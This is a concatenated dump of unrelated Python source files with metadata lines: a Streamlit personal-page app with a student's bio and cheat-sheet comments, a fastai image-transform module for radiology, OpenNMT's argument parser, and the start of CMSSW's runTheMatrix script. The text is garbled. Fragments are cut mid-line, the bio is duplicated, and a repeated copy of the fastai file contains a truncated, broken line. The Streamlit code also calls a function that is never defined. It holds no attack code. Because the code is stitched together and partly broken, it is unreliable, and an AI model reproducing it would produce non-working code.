Currently a Sophomore at University of Illinois at Urbana-Champaign
Working Nights on my degree from the System Engineering Program
**Hobbies:**
Trying to become a real guitar hero minus the game system, playing Valorant with the St Mark's crew, getting interesting eats no matter where I am, and playing toss with my baseball field rat of a cousin.
The newest hobby is figuring out what I can build with all the new breakthroughs in technology.
**Currently Working On**
Frameworks and Languages:
- Flask, Django, FastAPI, PyTorch, Streamlit, OpenCV, shell scripting, Python, C++
Databases:
- Postgres, Redis, MongoDB, and applicable ORMs
When I can get up for Air:
- React, swift(ios), Rust, GO!!
- Find a team to get a paper In Arxiv
**This site will be constantly updated as long as I program. Feel free to pass on the URL.**
''')


def div():
    """Backward-compatible no-op.

    Previously this wrapper only *defined* cs_body without calling or
    exporting it (making it unreachable from app()); cs_body now lives at
    module level, so there is nothing left for div() to do.
    """
    return None
# def main():
def app():
    """Entry point for this page: render the main body content."""
    # Sidebar rendering (cs_sidebar) is intentionally disabled here.
    cs_body()
    return None
| 26.845921
| 228
| 0.658226
|
"""
Off Multipage Cheatsheet
https://github.com/daniellewisDL/streamlit-cheat-sheet
@daniellewisDL : https://github.com/daniellewisDL
"""
import streamlit as st
from pathlib import Path
import base64
from modules.toc import *
st.set_page_config(
page_title='Code Compendium Intro Page',
layout="wide",
)
def img_to_bytes(img_path):
    """Read the file at *img_path* and return its contents base64-encoded.

    Useful for inlining images into HTML/markdown (e.g. ``data:`` URIs).
    """
    raw = Path(img_path).read_bytes()
    return base64.b64encode(raw).decode()
# <small>Summary of the [docs](https://docs.streamlit.io/en/stable/api.html), as of [Streamlit v1.0.0](https://www.streamlit.io/).</small>
# ''', unsafe_allow_html=True)
# st.sidebar.<widget>
# >>> a = st.sidebar.radio(\'R:\',[1,2])
# ''')
# $ streamlit --help
# $ streamlit run your_script.py
# $ streamlit hello
# $ streamlit config show
# $ streamlit cache clear
# $ streamlit docs
# $ streamlit --version
# ''')
# pip uninstall streamlit
# pip install streamlit-nightly --upgrade
# ''')
in.**
This webapp features the basic code snippets from all the "googling" I have done while programming.
I have taken the plunge and have created my own markdown notebooks organizing information from quick solution tidbits to documentation for programming languages.
Please visit my github for practical code and my research notebooks:
*[rypaik (Ryan Paik) · GitHub](https://github.com/rypaik)*
If you would like access to my Gist please email me.
ryanpaik@protonmail.com
-----
**Bio:**
Currently a Sophomore at University of Illinois at Urbana-Champaign
Working Nights on my degree from the System Engineering Program
**Hobbies:**
Trying to become a real guitar hero minus the game system, playing Valorant with the St Mark's crew, getting interesting eats no matter where I am, and playing toss with my baseball field rat of a cousin.
The newest hobby is figuring out what I can build with all the new breakthroughs in technology.
**Currently Working On**
Frameworks and Languages:
- Flask, Django, FastAPI, PyTorch, Streamlit, OpenCV, shell scripting, Python, C++
Databases:
- Postgres, Redis, MongoDB, and applicable ORMs
When I can get up for Air:
- React, swift(ios), Rust, GO!!
 - Find a team to get a paper on arXiv
**This site will be constantly updated as long as I program. Feel free to pass on the URL.**
''')
# col2.subheader('Display interactive widgets')
# col2.code('''
# st.button('Hit me')
# st.download_button('On the dl', data)
# st.checkbox('Check me out')
# st.radio('Radio', [1,2,3])
# st.selectbox('Select', [1,2,3])
# st.multiselect('Multiselect', [1,2,3])
# st.slider('Slide me', min_value=0, max_value=10)
# st.select_slider('Slide to select', options=[1,'2'])
# st.text_input('Enter some text')
# st.number_input('Enter a number')
# st.text_area('Area for textual entry')
# st.date_input('Date input')
# st.time_input('Time entry')
# st.file_uploader('File uploader')
# st.color_picker('Pick a color')
# ''')
# col2.write('Use widgets\' returned values in variables:')
# >>> for i in range(int(st.number_input('Num:'))): foo()
# >>> if st.sidebar.selectbox('I:',['f']) == 'f': b()
# >>> my_slider_val = st.slider('Quinn Mallory', 1, 88)
# >>> st.write(slider_val)
# ''')
)
# ''')
form_identifier')
# st.form_submit_button('Submit to me')
# st.container()
# st.columns(spec)
# >>> col1, col2 = st.columns(2)
# >>> col1.subheader('Columnisation')
# st.expander('Expander')
# >>> with st.expander('Expand'):
# >>> st.write('Juicy deets')
# ''')
# >>> with st.form(key='my_form'):
# >>> text_input = st.text_input(label='Enter some text')
# >>> submit_button = st.form_submit_button(label='Submit')
# ''')
)
# >>> with st.echo():
# >>> st.write('Code will be executed and printed')
# ''')
riable_1_to_100)
# st.spinner()
# >>> with st.spinner(text='In progress'):
# >>> time.sleep(5)
# >>> st.success('Done')
# st.balloons()
# st.error('Error message')
# st.warning('Warning message')
# st.info('Info message')
# st.success('Success message')
# st.exception(e)
# ''')
lder = st.empty()
# >>> my_placeholder.text('Replaced!')
# st.help(pandas.DataFrame)
# st.get_option(key)
# st.set_option(key, value)
# st.set_page_config(layout='wide')
# ''')
nerator.add_rows(data)
# >>> my_table = st.table(df1)
# >>> my_table.add_rows(df2)
# >>> my_chart = st.line_chart(df1)
# >>> my_chart.add_rows(df2)
# ''')
@st.cache
# ... def fetch_and_clean_data(url):
# ... # Mutate data at url
# ... return data
# >>> # Executes d1 as first time
# >>> d1 = fetch_and_clean_data(ref1)
# >>> # Does not execute d1; returns cached value, d1==d2
# >>> d2 = fetch_and_clean_data(ref1)
# >>> # Different arg, so function d1 executes
# >>> d3 = fetch_and_clean_data(ref2)
# ''')
# <small>[State API](https://docs.streamlit.io/en/stable/session_state_api.html)</small><br>
# <small>[Theme option reference](https://docs.streamlit.io/en/stable/theme_options.html)</small><br>
# <small>[Components API reference](https://docs.streamlit.io/en/stable/develop_streamlit_components.html)</small><br>
# <small>[API cheat sheet](https://share.streamlit.io/daniellewisdl/streamlit-cheat-sheet/app.py)</small><br>
# ''', unsafe_allow_html=True)
def app():
    """Render this page by delegating to cs_body()."""
    cs_body()
    return None
| false
| true
|
790c4f569deac0e789782b59e58ef492e5915eaf
| 4,394
|
py
|
Python
|
train/tfms.py
|
lluissalord/radiology_ai
|
8b842502206f4bad53c2825beb1f58d2ed054d0d
|
[
"MIT"
] | 3
|
2021-02-08T10:58:22.000Z
|
2021-08-18T19:51:27.000Z
|
train/tfms.py
|
lluissalord/radiology_ai
|
8b842502206f4bad53c2825beb1f58d2ed054d0d
|
[
"MIT"
] | null | null | null |
train/tfms.py
|
lluissalord/radiology_ai
|
8b842502206f4bad53c2825beb1f58d2ed054d0d
|
[
"MIT"
] | null | null | null |
from fastai.data.all import IntToFloatTensor
from fastai.vision.learner import *
from fastai.vision.augment import *
from fastai.vision.core import PILImageBW, PILImage
from fastai.vision.data import *
from preprocessing.transforms import *
# from preprocessing.dicom import *
from preprocessing.misc import *
def get_item_tfms(run_params):
    """Build the list of item-level (per-image, CPU) transforms.

    Order matters: knee localization / resize first, then background
    cleanup, then histogram scaling (CLAHE or bin-based).
    """
    tfms = []

    # Either crop around the knee with the SVM-based localizer, or fall
    # back to a plain zero-padded resize.
    if run_params["KNEE_LOCALIZER"]:
        tfms.append(
            KneeLocalizer(
                run_params["KNEE_SVM_MODEL_PATH"],
                PIL_cls=PILImageBW,
                resize=run_params["RESIZE"],
                np_input=len(tfms) > 0,
                np_output=True,
            )
        )
    else:
        tfms.append(
            Resize(
                run_params["RESIZE"], method=ResizeMethod.Pad, pad_mode=PadMode.Zeros
            )
        )

    if run_params["BACKGROUND_PREPROCESS"]:
        tfms.append(
            BackgroundPreprocess(
                PIL_cls=PILImageBW, np_input=len(tfms) > 0, np_output=True
            )
        )

    # Histogram scaling of the pixel data on the fly.
    if run_params["CLAHE_SCALED"]:
        tfms.append(
            CLAHE_Transform(
                PIL_cls=PILImageBW,
                grayscale=not run_params["SELF_SUPERVISED"],
                np_input=len(tfms) > 0,
                np_output=False,
            )
        )
    elif run_params["HIST_SCALED"]:
        if run_params["HIST_SCALED_SELF"]:
            bins = None
        else:
            # NOTE(review): relies on module-level `unlabel_all_df` and
            # `label_df` being defined before this call — confirm with caller.
            all_valid_raw_preprocess = pd.concat(
                [pd.Series(unlabel_all_df.index), label_df["Raw_preprocess"]]
            )
            bins = init_bins(
                fnames=L(list(all_valid_raw_preprocess.values)),
                n_samples=100,
                isDCM=False,
            )
        tfms.append(HistScaled_all(bins))

    return tfms
def get_batch_tfms(run_params):
    """Build batch-level (GPU) transforms for labelled and unlabelled data.

    Returns ``(label_tfms, unlabel_tfms)``. ``unlabel_tfms`` always starts
    with a plain int->float conversion pipeline; depending on the SSL mode
    (FixMatch or MixMatch) extra augmentation pipelines are appended.
    """
    # Pixel data is stored as uint16, hence the 2**16 - 1 divisor.
    label_tfms = [
        IntToFloatTensor(div=2 ** 16 - 1),
        *aug_transforms(
            pad_mode=PadMode.Zeros,
            mult=1.0,
            do_flip=True,
            flip_vert=False,
            max_rotate=90.0,
            min_zoom=0.9,
            max_zoom=1.2,
            max_lighting=0.4,
            max_warp=0.4,
            p_affine=0.9,
            p_lighting=0.9,
            mode="bilinear",
            align_corners=True,
        ),
        RandomResizedCropGPU(
            run_params["RANDOM_RESIZE_CROP"], min_scale=run_params["RANDOM_MIN_SCALE"]
        ),
        # Normalize() omitted — issue with CPU vs GPU interaction
    ]

    unlabel_tfms = [[IntToFloatTensor(div=2 ** 16 - 1)]]

    ssl_mode = run_params["SSL"]
    if ssl_mode == run_params["SSL_FIX_MATCH"]:
        # FixMatch: one weak and one strong augmentation pipeline.
        unlabel_tfms.append([
            IntToFloatTensor(div=1),
            RandomResizedCropGPU(
                run_params["RANDOM_RESIZE_CROP"],
                min_scale=run_params["RANDOM_MIN_SCALE"],
            ),
            Flip(),
        ])
        unlabel_tfms.append([
            IntToFloatTensor(div=1),
            RandomResizedCropGPU(
                run_params["RANDOM_RESIZE_CROP"],
                min_scale=run_params["RANDOM_MIN_SCALE"],
            ),
            Flip(),
            Rotate(180),
            Brightness(),
            Contrast(),
            RandomErasing(),
        ])
    elif ssl_mode == run_params["SSL_MIX_MATCH"]:
        # MixMatch: a single augmentation pipeline for unlabelled batches.
        unlabel_tfms.append([
            IntToFloatTensor(div=2 ** 16 - 1),
            RandomResizedCropGPU(
                run_params["RANDOM_RESIZE_CROP"],
                min_scale=run_params["RANDOM_MIN_SCALE"],
            ),
            Flip(),
            Rotate(180),
            Brightness(),
            Contrast(),
        ])

    return label_tfms, unlabel_tfms
| 30.303448
| 197
| 0.561447
|
from fastai.data.all import IntToFloatTensor
from fastai.vision.learner import *
from fastai.vision.augment import *
from fastai.vision.core import PILImageBW, PILImage
from fastai.vision.data import *
from preprocessing.transforms import *
from preprocessing.misc import *
def get_item_tfms(run_params):
item_tfms = []
if run_params["KNEE_LOCALIZER"]:
item_tfms.append(
KneeLocalizer(
run_params["KNEE_SVM_MODEL_PATH"],
PIL_cls=PILImageBW,
resize=run_params["RESIZE"],
np_input=len(item_tfms) > 0,
np_output=True,
)
)
else:
item_tfms.append(
Resize(
run_params["RESIZE"], method=ResizeMethod.Pad, pad_mode=PadMode.Zeros
)
)
if run_params["BACKGROUND_PREPROCESS"]:
item_tfms.append(
BackgroundPreprocess(
PIL_cls=PILImageBW, np_input=len(item_tfms) > 0, np_output=True
)
)
if run_params["CLAHE_SCALED"]:
item_tfms.append(
CLAHE_Transform(
PIL_cls=PILImageBW,
grayscale=not run_params["SELF_SUPERVISED"],
np_input=len(item_tfms) > 0,
np_output=False,
)
)
elif run_params["HIST_SCALED"]:
if run_params["HIST_SCALED_SELF"]:
bins = None
else:
all_valid_raw_preprocess = pd.concat(
[pd.Series(unlabel_all_df.index), label_df["Raw_preprocess"]]
)
bins = init_bins(
fnames=L(list(all_valid_raw_preprocess.values)),
n_samples=100,
isDCM=False,
)
item_tfms.append(HistScaled_all(bins))
return item_tfms
def get_batch_tfms(run_params):
label_tfms = [
IntToFloatTensor(div=2 ** 16 - 1),
*aug_transforms(
pad_mode=PadMode.Zeros,
mult=1.0,
do_flip=True,
flip_vert=False,
max_rotate=90.0,
min_zoom=0.9,
max_zoom=1.2,
max_lighting=0.4,
max_warp=0.4,
p_affine=0.9,
p_lighting=0.9,
mode="bilinear",
align_corners=True,
),
RandomResizedCropGPU(
run_params["RANDOM_RESIZE_CROP"], min_scale=run_params["RANDOM_MIN_SCALE"]
),
loatTensor(div=2 ** 16 - 1)]]
if run_params["SSL"] == run_params["SSL_FIX_MATCH"]:
weak_transform = [
IntToFloatTensor(div=1),
RandomResizedCropGPU(
run_params["RANDOM_RESIZE_CROP"],
min_scale=run_params["RANDOM_MIN_SCALE"],
),
Flip(),
]
unlabel_tfms.append(weak_transform)
strong_transform = [
IntToFloatTensor(div=1),
RandomResizedCropGPU(
run_params["RANDOM_RESIZE_CROP"],
min_scale=run_params["RANDOM_MIN_SCALE"],
),
Flip(),
Rotate(180),
Brightness(),
Contrast(),
RandomErasing(),
]
unlabel_tfms.append(strong_transform)
elif run_params["SSL"] == run_params["SSL_MIX_MATCH"]:
unlabel_transform = [
IntToFloatTensor(div=2 ** 16 - 1),
RandomResizedCropGPU(
run_params["RANDOM_RESIZE_CROP"],
min_scale=run_params["RANDOM_MIN_SCALE"],
),
Flip(),
Rotate(180),
Brightness(),
Contrast(),
]
unlabel_tfms.append(unlabel_transform)
return label_tfms, unlabel_tfms
| true
| true
|
790c5016a7012f3bdea209e0d82aeb0e30f0aae5
| 5,783
|
py
|
Python
|
onmt/utils/parse.py
|
ACL2020-Submission/ACL2020
|
2a3d6e26d22c650cad823c68b65ee315aa1fe22c
|
[
"MIT"
] | null | null | null |
onmt/utils/parse.py
|
ACL2020-Submission/ACL2020
|
2a3d6e26d22c650cad823c68b65ee315aa1fe22c
|
[
"MIT"
] | null | null | null |
onmt/utils/parse.py
|
ACL2020-Submission/ACL2020
|
2a3d6e26d22c650cad823c68b65ee315aa1fe22c
|
[
"MIT"
] | null | null | null |
import configargparse as cfargparse
import os
import torch
import onmt.opts as opts
from onmt.utils.logging import logger
class ArgumentParser(cfargparse.ArgumentParser):
    """configargparse-based parser with OpenNMT option helpers.

    Uses YAML config files and shows defaults in ``--help``; the
    classmethods below normalize and validate parsed option namespaces.
    """
    def __init__(
            self,
            config_file_parser_class=cfargparse.YAMLConfigFileParser,
            formatter_class=cfargparse.ArgumentDefaultsHelpFormatter,
            **kwargs):
        super(ArgumentParser, self).__init__(
            config_file_parser_class=config_file_parser_class,
            formatter_class=formatter_class,
            **kwargs)
    @classmethod
    def defaults(cls, *args):
        """Get default arguments added to a parser by all ``*args``."""
        dummy_parser = cls()
        for callback in args:
            callback(dummy_parser)
        # Parsing an empty argv yields a namespace of pure defaults.
        defaults = dummy_parser.parse_known_args([])[0]
        return defaults
    @classmethod
    def update_model_opts(cls, model_opt):
        """Expand shorthand options into per-side variants, in place.

        ``word_vec_size``/``layers``/``rnn_size`` > 0 override the separate
        encoder/decoder settings; also derives ``brnn`` from the encoder
        type and fills the default ``copy_attn_type``.
        """
        if model_opt.word_vec_size > 0:
            model_opt.src_word_vec_size = model_opt.word_vec_size
            model_opt.tgt_word_vec_size = model_opt.word_vec_size
        if model_opt.layers > 0:
            model_opt.enc_layers = model_opt.layers
            model_opt.dec_layers = model_opt.layers
        if model_opt.rnn_size > 0:
            model_opt.enc_rnn_size = model_opt.rnn_size
            model_opt.dec_rnn_size = model_opt.rnn_size
        model_opt.brnn = model_opt.encoder_type == "brnn"
        if model_opt.copy_attn_type is None:
            model_opt.copy_attn_type = model_opt.global_attention
    @classmethod
    def validate_model_opts(cls, model_opt):
        """Raise AssertionError for inconsistent model options."""
        assert model_opt.model_type in ["text", "img", "audio", "vec"], \
            "Unsupported model type %s" % model_opt.model_type
        # this check is here because audio allows the encoder and decoder to
        # be different sizes, but other model types do not yet
        same_size = model_opt.enc_rnn_size == model_opt.dec_rnn_size
        assert model_opt.model_type == 'audio' or same_size, \
            "The encoder and decoder rnns must be the same size for now"
        assert model_opt.rnn_type != "SRU" or model_opt.gpu_ranks, \
            "Using SRU requires -gpu_ranks set."
        if model_opt.share_embeddings:
            if model_opt.model_type != "text":
                raise AssertionError(
                    "--share_embeddings requires --model_type text.")
    @classmethod
    def ckpt_model_opts(cls, ckpt_opt):
        """Return checkpoint options merged over current defaults."""
        # Load default opt values, then overwrite with the opts in
        # the checkpoint. That way, if there are new options added,
        # the defaults are used.
        opt = cls.defaults(opts.model_opts)
        opt.__dict__.update(ckpt_opt.__dict__)
        return opt
    @classmethod
    def validate_train_opts(cls, opt):
        """Reject deprecated or inconsistent training options."""
        if opt.epochs:
            raise AssertionError(
                  "-epochs is deprecated please use -train_steps.")
        if opt.truncated_decoder > 0 and max(opt.accum_count) > 1:
            raise AssertionError("BPTT is not compatible with -accum > 1")
        if opt.gpuid:
            raise AssertionError(
                  "gpuid is deprecated see world_size and gpu_ranks")
        if torch.cuda.is_available() and not opt.gpu_ranks:
            logger.info("WARNING: You have a CUDA device, \
                        should run with -gpu_ranks")
        if opt.world_size < len(opt.gpu_ranks):
            raise AssertionError(
                  "parameter counts of -gpu_ranks must be less or equal "
                  "than -world_size.")
        if opt.world_size == len(opt.gpu_ranks) and \
                min(opt.gpu_ranks) > 0:
            raise AssertionError(
                  "-gpu_ranks should have master(=0) rank "
                  "unless -world_size is greater than len(gpu_ranks).")
        assert len(opt.data_ids) == len(opt.data_weights), \
            "Please check -data_ids and -data_weights options!"
        assert len(opt.dropout) == len(opt.dropout_steps), \
            "Number of dropout values must match accum_steps values"
        assert len(opt.attention_dropout) == len(opt.dropout_steps), \
            "Number of attention_dropout values must match accum_steps values"
    @classmethod
    def validate_translate_opts(cls, opt):
        """Reject mutually exclusive decoding strategies."""
        if opt.beam_size != 1 and opt.random_sampling_topk != 1:
            raise ValueError('Can either do beam search OR random sampling.')
    @classmethod
    def validate_preprocess_args(cls, opt):
        """Check preprocessing options and that all input paths exist."""
        assert opt.max_shard_size == 0, \
            "-max_shard_size is deprecated. Please use \
            -shard_size (number of examples) instead."
        assert opt.shuffle == 0, \
            "-shuffle is not implemented. Please shuffle \
            your data before pre-processing."
        assert len(opt.train_src) == len(opt.train_tgt), \
            "Please provide same number of src and tgt train files!"
        assert len(opt.train_src) == len(opt.train_ids), \
            "Please provide proper -train_ids for your data!"
        for file in opt.train_src + opt.train_tgt:
            assert os.path.isfile(file), "Please check path of %s" % file
        assert not opt.valid_src or os.path.isfile(opt.valid_src), \
            "Please check path of your valid src file!"
        assert not opt.valid_tgt or os.path.isfile(opt.valid_tgt), \
            "Please check path of your valid tgt file!"
        assert not opt.src_vocab or os.path.isfile(opt.src_vocab), \
            "Please check path of your src vocab!"
        assert not opt.tgt_vocab or os.path.isfile(opt.tgt_vocab), \
            "Please check path of your tgt vocab!"
| 41.307143
| 79
| 0.6175
|
import configargparse as cfargparse
import os
import torch
import onmt.opts as opts
from onmt.utils.logging import logger
class ArgumentParser(cfargparse.ArgumentParser):
def __init__(
self,
config_file_parser_class=cfargparse.YAMLConfigFileParser,
formatter_class=cfargparse.ArgumentDefaultsHelpFormatter,
**kwargs):
super(ArgumentParser, self).__init__(
config_file_parser_class=config_file_parser_class,
formatter_class=formatter_class,
**kwargs)
@classmethod
def defaults(cls, *args):
dummy_parser = cls()
for callback in args:
callback(dummy_parser)
defaults = dummy_parser.parse_known_args([])[0]
return defaults
@classmethod
def update_model_opts(cls, model_opt):
if model_opt.word_vec_size > 0:
model_opt.src_word_vec_size = model_opt.word_vec_size
model_opt.tgt_word_vec_size = model_opt.word_vec_size
if model_opt.layers > 0:
model_opt.enc_layers = model_opt.layers
model_opt.dec_layers = model_opt.layers
if model_opt.rnn_size > 0:
model_opt.enc_rnn_size = model_opt.rnn_size
model_opt.dec_rnn_size = model_opt.rnn_size
model_opt.brnn = model_opt.encoder_type == "brnn"
if model_opt.copy_attn_type is None:
model_opt.copy_attn_type = model_opt.global_attention
@classmethod
def validate_model_opts(cls, model_opt):
assert model_opt.model_type in ["text", "img", "audio", "vec"], \
"Unsupported model type %s" % model_opt.model_type
same_size = model_opt.enc_rnn_size == model_opt.dec_rnn_size
assert model_opt.model_type == 'audio' or same_size, \
"The encoder and decoder rnns must be the same size for now"
assert model_opt.rnn_type != "SRU" or model_opt.gpu_ranks, \
"Using SRU requires -gpu_ranks set."
if model_opt.share_embeddings:
if model_opt.model_type != "text":
raise AssertionError(
"--share_embeddings requires --model_type text.")
@classmethod
def ckpt_model_opts(cls, ckpt_opt):
opt = cls.defaults(opts.model_opts)
opt.__dict__.update(ckpt_opt.__dict__)
return opt
@classmethod
def validate_train_opts(cls, opt):
if opt.epochs:
raise AssertionError(
"-epochs is deprecated please use -train_steps.")
if opt.truncated_decoder > 0 and max(opt.accum_count) > 1:
raise AssertionError("BPTT is not compatible with -accum > 1")
if opt.gpuid:
raise AssertionError(
"gpuid is deprecated see world_size and gpu_ranks")
if torch.cuda.is_available() and not opt.gpu_ranks:
logger.info("WARNING: You have a CUDA device, \
should run with -gpu_ranks")
if opt.world_size < len(opt.gpu_ranks):
raise AssertionError(
"parameter counts of -gpu_ranks must be less or equal "
"than -world_size.")
if opt.world_size == len(opt.gpu_ranks) and \
min(opt.gpu_ranks) > 0:
raise AssertionError(
"-gpu_ranks should have master(=0) rank "
"unless -world_size is greater than len(gpu_ranks).")
assert len(opt.data_ids) == len(opt.data_weights), \
"Please check -data_ids and -data_weights options!"
assert len(opt.dropout) == len(opt.dropout_steps), \
"Number of dropout values must match accum_steps values"
assert len(opt.attention_dropout) == len(opt.dropout_steps), \
"Number of attention_dropout values must match accum_steps values"
@classmethod
def validate_translate_opts(cls, opt):
if opt.beam_size != 1 and opt.random_sampling_topk != 1:
raise ValueError('Can either do beam search OR random sampling.')
@classmethod
def validate_preprocess_args(cls, opt):
assert opt.max_shard_size == 0, \
"-max_shard_size is deprecated. Please use \
-shard_size (number of examples) instead."
assert opt.shuffle == 0, \
"-shuffle is not implemented. Please shuffle \
your data before pre-processing."
assert len(opt.train_src) == len(opt.train_tgt), \
"Please provide same number of src and tgt train files!"
assert len(opt.train_src) == len(opt.train_ids), \
"Please provide proper -train_ids for your data!"
for file in opt.train_src + opt.train_tgt:
assert os.path.isfile(file), "Please check path of %s" % file
assert not opt.valid_src or os.path.isfile(opt.valid_src), \
"Please check path of your valid src file!"
assert not opt.valid_tgt or os.path.isfile(opt.valid_tgt), \
"Please check path of your valid tgt file!"
assert not opt.src_vocab or os.path.isfile(opt.src_vocab), \
"Please check path of your src vocab!"
assert not opt.tgt_vocab or os.path.isfile(opt.tgt_vocab), \
"Please check path of your tgt vocab!"
| true
| true
|
790c5028cb5c7b0ac170367e3ba00736ba805ec9
| 14,528
|
py
|
Python
|
Configuration/PyReleaseValidation/scripts/runTheMatrix.py
|
NTrevisani/cmssw
|
a212a27526f34eb9507cf8b875c93896e6544781
|
[
"Apache-2.0"
] | 1
|
2020-06-08T11:39:24.000Z
|
2020-06-08T11:39:24.000Z
|
Configuration/PyReleaseValidation/scripts/runTheMatrix.py
|
NTrevisani/cmssw
|
a212a27526f34eb9507cf8b875c93896e6544781
|
[
"Apache-2.0"
] | null | null | null |
Configuration/PyReleaseValidation/scripts/runTheMatrix.py
|
NTrevisani/cmssw
|
a212a27526f34eb9507cf8b875c93896e6544781
|
[
"Apache-2.0"
] | 1
|
2020-07-26T16:42:20.000Z
|
2020-07-26T16:42:20.000Z
|
#!/usr/bin/env python
from __future__ import print_function
import sys
from Configuration.PyReleaseValidation.MatrixReader import MatrixReader
from Configuration.PyReleaseValidation.MatrixRunner import MatrixRunner
from Configuration.PyReleaseValidation.MatrixInjector import MatrixInjector,performInjectionOptionTest
# ================================================================================
def showRaw(opt):
    """Dump the raw .txt matrix description (legacy prodAgent interface)."""
    reader = MatrixReader(opt)
    reader.showRaw(
        opt.useInput,
        opt.refRel,
        opt.fromScratch,
        opt.raw,
        opt.step1Only,
        selected=opt.testList,
    )
    return 0
# ================================================================================
def runSelected(opt):
    """Run (or just display) the selected workflows and optionally inject
    them into WMAgent.

    Returns 0 on success, non-zero otherwise (used as the exit status).
    """
    mrd = MatrixReader(opt)
    mrd.prepare(opt.useInput, opt.refRel, opt.fromScratch)

    # reject workflow ids that are not defined in the matrix
    if opt.testList:
        definedWF = []
        for dwf in mrd.workFlows: definedWF.append(dwf.numId)
        for twf in opt.testList:
            if twf not in definedWF:
                # fix: single formatted message instead of a 3-element args tuple
                raise ValueError('Not defined workflow %s requested' % str(twf))

    ret = 0
    if opt.show:
        # display-only mode: print the matrix, run nothing
        mrd.show(opt.testList, opt.extended, opt.cafVeto)
        # fix: message read 'testListected items:' — botched rename of 'selected'
        if opt.testList: print('selected items:', opt.testList)
    else:
        mRunnerHi = MatrixRunner(mrd.workFlows, opt.nProcs, opt.nThreads)
        ret = mRunnerHi.runTests(opt)

    if opt.wmcontrol:
        if ret != 0:
            print('Cannot go on with wmagent injection with failing workflows')
        else:
            wfInjector = MatrixInjector(opt, mode=opt.wmcontrol, options=opt.wmoptions)
            ret = wfInjector.prepare(mrd, mRunnerHi.runDirs)
            if ret == 0:
                wfInjector.upload()
                wfInjector.submit()

    return ret
# ================================================================================
if __name__ == '__main__':

    # Named shortcuts for -l/--list; each entry maps to a set of workflow ids.
    #this can get out of here
    predefinedSet={
        'limited' : [5.1, #FastSim ttbar
                     7.3, #CosmicsSPLoose_UP17
                     8, #BH/Cosmic MC
                     25, #MC ttbar
                     4.22, #cosmic data
                     4.53, #run1 data + miniAOD
                     9.0, #Higgs200 charged taus
                     1000, #data+prompt
                     1001, #data+express
                     101.0, #SingleElectron120E120EHCAL
                     136.731, #2016B Photon data
                     136.7611, #2016E JetHT reMINIAOD from 80X legacy
                     136.8311, #2017F JetHT reMINIAOD from 94X reprocessing
                     136.788, #2017B Photon data
                     136.85, #2018A Egamma data
                     140.53, #2011 HI data
                     140.56, #2018 HI data
                     158.0, #2018 HI MC with pp-like reco
                     1306.0, #SingleMu Pt1 UP15
                     1325.7, #test NanoAOD from existing MINI
                     1330, #Run2 MC Zmm
                     135.4, #Run 2 Zee ttbar
                     10042.0, #2017 ZMM
                     10024.0, #2017 ttbar
                     10224.0, #2017 ttbar PU
                     10824.0, #2018 ttbar
                     11634.0, #2021 ttbar
                     12434.0, #2023 ttbar
                     20034.0, #2026D35 ttbar (MTD TDR baseline)
                     20434.0, #2026D41 ttbar (L1T TDR baseline)
                     21234.0, #2026D44 (exercise HF nose)
                     22034.0, #2026D46 ttbar (exercise V11 HGCal)
                     25202.0, #2016 ttbar UP15 PU
                     250202.181, #2018 ttbar stage1 + stage2 premix
                     ],
        'jetmc': [5.1, 13, 15, 25, 38, 39], #MC
        'metmc' : [5.1, 15, 25, 37, 38, 39], #MC
        'muonmc' : [5.1, 124.4, 124.5, 20, 21, 22, 23, 25, 30], #MC
        }

    import optparse
    usage = 'usage: runTheMatrix.py --show -s '

    parser = optparse.OptionParser(usage)

    parser.add_option('-b','--batchName',
                      help='relval batch: suffix to be appended to Campaign name',
                      dest='batchName',
                      default=''
                     )
    parser.add_option('-m','--memoryOffset',
                      help='memory of the wf for single core',
                      dest='memoryOffset',
                      default=3000
                     )
    parser.add_option('--addMemPerCore',
                      help='increase of memory per each n > 1 core: memory(n_core) = memoryOffset + (n_core-1) * memPerCore',
                      dest='memPerCore',
                      default=1500
                     )
    parser.add_option('-j','--nproc',
                      help='number of processes. 0 Will use 4 processes, not execute anything but create the wfs',
                      dest='nProcs',
                      default=4
                     )
    parser.add_option('-t','--nThreads',
                      help='number of threads per process to use in cmsRun.',
                      dest='nThreads',
                      default=1
                     )
    parser.add_option('-n','--showMatrix',
                      help='Only show the worflows. Use --ext to show more',
                      dest='show',
                      default=False,
                      action='store_true'
                     )
    parser.add_option('-e','--extended',
                      help='Show details of workflows, used with --show',
                      dest='extended',
                      default=False,
                      action='store_true'
                     )
    parser.add_option('-s','--selected',
                      help='Run a pre-defined selected matrix of wf. Deprecated, please use -l limited',
                      dest='restricted',
                      default=False,
                      action='store_true'
                     )
    parser.add_option('-l','--list',
                      help='Coma separated list of workflow to be shown or ran. Possible keys are also '+str(predefinedSet.keys())+'. and wild card like muon, or mc',
                      dest='testList',
                      default=None
                     )
    parser.add_option('-r','--raw',
                      help='Temporary dump the .txt needed for prodAgent interface. To be discontinued soon. Argument must be the name of the set (standard, pileup,...)',
                      dest='raw'
                     )
    parser.add_option('-i','--useInput',
                      help='Use recyling where available. Either all, or a coma separated list of wf number.',
                      dest='useInput',
                      default=None
                     )
    parser.add_option('-w','--what',
                      help='Specify the set to be used. Argument must be the name of the set (standard, pileup,...)',
                      dest='what',
                      default='all'
                     )
    parser.add_option('--step1',
                      help='Used with --raw. Limit the production to step1',
                      dest='step1Only',
                      default=False
                     )
    parser.add_option('--maxSteps',
                      help='Only run maximum on maxSteps. Used when we are only interested in first n steps.',
                      dest='maxSteps',
                      default=9999,
                      type="int"
                     )
    parser.add_option('--fromScratch',
                      help='Coma separated list of wf to be run without recycling. all is not supported as default.',
                      dest='fromScratch',
                      default=None
                     )
    parser.add_option('--refRelease',
                      help='Allow to modify the recycling dataset version',
                      dest='refRel',
                      default=None
                     )
    parser.add_option('--wmcontrol',
                      help='Create the workflows for injection to WMAgent. In the WORKING. -wmcontrol init will create the the workflows, -wmcontrol test will dryRun a test, -wmcontrol submit will submit to wmagent',
                      choices=['init','test','submit','force'],
                      dest='wmcontrol',
                      default=None,
                     )
    parser.add_option('--revertDqmio',
                      help='When submitting workflows to wmcontrol, force DQM outout to use pool and not DQMIO',
                      choices=['yes','no'],
                      dest='revertDqmio',
                      default='no',
                     )
    parser.add_option('--optionswm',
                      help='Specify a few things for wm injection',
                      default='',
                      dest='wmoptions')
    parser.add_option('--keep',
                      help='allow to specify for which coma separated steps the output is needed',
                      default=None)
    parser.add_option('--label',
                      help='allow to give a special label to the output dataset name',
                      default='')
    parser.add_option('--command',
                      help='provide a way to add additional command to all of the cmsDriver commands in the matrix',
                      dest='command',
                      default=None
                     )
    parser.add_option('--apply',
                      help='allow to use the --command only for 1 coma separeated',
                      dest='apply',
                      default=None)
